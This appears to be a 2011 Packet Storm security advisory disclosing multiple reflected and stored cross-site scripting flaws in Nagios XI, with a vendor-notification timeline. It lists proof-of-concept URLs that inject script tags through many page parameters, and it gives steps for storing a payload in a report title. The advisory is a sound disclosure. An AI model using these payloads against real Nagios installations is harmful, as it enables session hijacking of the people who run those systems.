Lucene search
K

Nagios XI Cross Site Scripting

🗓️ 15 Dec 2011 00:00:00Reported by 0a2940Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 40 Views

Nagios XI Cross Site Scripting vulnerabilities reported and fixe

Code
`================  
Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9  
  
Author: 0a29406d9794e4f9b30b3c5d6702c708  
  
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940  
================  
Description:  
================  
  
Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this  
list is non-exhaustive, due to the sheer number of issues. Of particular note  
is XSS on the login page, and the ability to pass XSS through the login page,  
using the redirect parameter, e.g.  
http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>  
  
Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in  
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9  
- 12/07/2011)  
  
================  
Timeline:  
================  
  
16 November 2011 - Reported to Nagios Enterprises  
16 November 2011 - Acknowledged  
13 December 2011 - Nagios XI 2011R1.9 released  
16 December 2011 - Nagios Enterprises report fixed  
16 December 2011 - Public disclosure  
  
================  
Details:  
================  
  
Reflected XSS  
-----  
  
Page: /nagiosxi/login.php  
Variables: -  
PoCs: http://site/nagiosxi/login.php/";alert('0a29');"  
Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe  
manner  
Also affects:  
/nagiosxi/about/index.php  
/nagiosxi/about/index.php  
/nagiosxi/about/main.php  
/nagiosxi/account/main.php  
/nagiosxi/account/notifymethods.php  
/nagiosxi/account/notifymsgs.php  
/nagiosxi/account/notifyprefs.php  
/nagiosxi/account/testnotification.php  
/nagiosxi/help/index.php  
/nagiosxi/help/main.php  
/nagiosxi/includes/components/alertstream/go.php  
/nagiosxi/includes/components/alertstream/index.php  
/nagiosxi/includes/components/hypermap_replay/index.php  
/nagiosxi/includes/components/massacknowledge/mass_ack.php  
/nagiosxi/includes/components/xicore/recurringdowntime.php/  
/nagiosxi/includes/components/xicore/status.php  
/nagiosxi/includes/components/xicore/tac.php  
/nagiosxi/reports/alertheatmap.php  
/nagiosxi/reports/availability.php  
/nagiosxi/reports/eventlog.php  
/nagiosxi/reports/histogram.php  
/nagiosxi/reports/index.php  
/nagiosxi/reports/myreports.php  
/nagiosxi/reports/nagioscorereports.php  
/nagiosxi/reports/notifications.php  
/nagiosxi/reports/statehistory.php  
/nagiosxi/reports/topalertproducers.php  
/nagiosxi/views/index.php  
/nagiosxi/views/main.php  
  
Page: /nagiosxi/account/  
Variables: xiwindow  
PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>  
  
Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php  
Variables: -  
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>  
  
Page: /nagiosxi/includes/components/xicore/status.php  
Variables: hostgroup, style  
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script>  
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>  
  
Page: /nagiosxi/includes/components/xicore/recurringdowntime.php  
Variables: -  
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>  
  
  
Page: /nagiosxi/reports/alertheatmap.php  
Variables: height, host, service, width  
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/histogram.php  
Variable: service  
PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/notifications.php  
Variables: host, service  
PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/statehistory.php  
Variables: host, service  
PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>  
  
  
Stored XSS  
-----  
  
Page: /nagiosxi/reports/myreports.php  
Variable: title  
Details: It is possible to store XSS within 'My Reports', however it  
is believed this  
is only viewable by the logged-in user.  
1) View a report and save it, e.g.  
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D  
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation